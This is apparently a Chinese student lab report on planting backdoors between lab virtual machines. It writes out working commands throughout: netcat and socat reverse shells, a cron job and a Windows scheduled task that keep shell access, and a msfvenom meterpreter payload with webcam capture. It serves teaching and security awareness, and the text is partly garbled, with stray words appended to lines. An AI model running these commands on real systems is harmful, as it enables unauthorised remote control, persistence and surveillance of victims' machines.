目录html
例举你能想到的一个后门进入到你系统中的可能方式?linux
例举你知道的后门如何启动起来(win及linux)的方式?git
Meterpreter有哪些给你映像深入的功能?shell
如何发现本身有系统有没有被安装后门?windows
安装杀毒软件,定时检查本身的电脑安全
保持本身电脑的windows defender处于开启的状态服务器
可以及时的发现后门,并删除。网络
参考资料:tcp
Netcat简介工具
关于netcat,找了一些专门介绍的博客,netcat是一个经过TCP/UDP在网络中进行读写数据工具,被称为“瑞士军刀”,主要用于调试领域、传输领域甚至黑客攻击领域。利用该工具,能够将网络中一端的数据完整的发送至另外一台主机终端显示或存储,常见的应用为文件传输、与好友即时通讯、传输流媒体或者做为用来验证服务器的独立的客户端。
主要功能
netcat在kali里能够直接使用,windows中须要下载后使用(Socat同理)。
它的简单使用过程在下面实践过程记录中会有详细的介绍。
参考资料:
Netcat++,超级netcat工具
参考资料:
这是一个生成后门程序的平台,把后门的基本功能(基本的链接、执行指令),扩展功能(如搜集用户信息、安装服务等功能),编码模式,运行平台,以及运行参数,全都作成零件或可调整的参数。用的时候按须要组合,就能够生成一个可执行文件。
本次实验主要用Metaspolit的msfvenom指令来生成一个后门可执行文件。
写在前面的话:在本次实验中我一开始用的是本机做为windows端,可是因为个人win10是家庭版,windows defender不能彻底关闭,在设置文件夹信任以后,权限又出现了问题,因此,后来在完成任务四时,切到了虚拟机来完成。如下是个人三个端的IP地址
本机windows 172.16.2.51
虚拟机kali 192.168.139.138
虚拟机windows7 192.168.139.140
ncat.exe -l -p 5211
,打开监听,其中,5211为监听的端口。nc 192.168.20.175 5211 -e /bin/sh
,反弹链接Windows端。这个操做与上一个操做相似了,如下主要过程:
nc -l -p 5211
ncat.exe -e cmd.exe 192.168.139.138 5211
ncat.exe -l 5211
,实现监听5211端口ncat 172.16.2.51 5211
,链接到windows的5211端口,输入一些数据Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令
ncat.exe -l -p 5211
,监听本机的5211端口。在kali端下,输入crontab -e,实现编辑一条定时任务。
打开后,在最后一行添加 命令 05 * * * * /bin/netcat 172.16.2.51 5211 -e /bin/sh
,即为每小时的5分运行此命令。
在windows系统下,计算机管理
-->任务计划程序
-->建立任务
新建触发器,选择,当工做站锁定时。
在操做中,将程序或脚本中选择socat.exe
路径,参数一栏填写tcp-listen:5211 exec:cmd.exe,pty,stderr
socat - tcp:172.16.2.51:5211
,便可得到windows的shell。msfvenom
指令生成一个后门程序。msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.138 LPORT=5211 -f exe > 20165211_Akashi.exe
经过nc将生成的可执行文件发送到目标windows端
Kali端:
windows端:
kali端:
在尝试获取主机摄像头时,出现了以下错误
检查后发现,虚拟的摄像头未分配,将虚拟机的摄像头打开后便可正常运行。
在本次实验中,在体验了MSF的功能以后,虽然是一场本身打本身的过程,可是在现实中,若是不注意信息安全,没有安全意识,这样简单的过程,其实彻底能够完成一场完整的黑客行为。(默默关掉了摄像头……)
仍是要注意本身的信息安全,不随意使用来路不明的U盘,不点击有危险的文件,网络危机四伏,仍是要时刻注意的。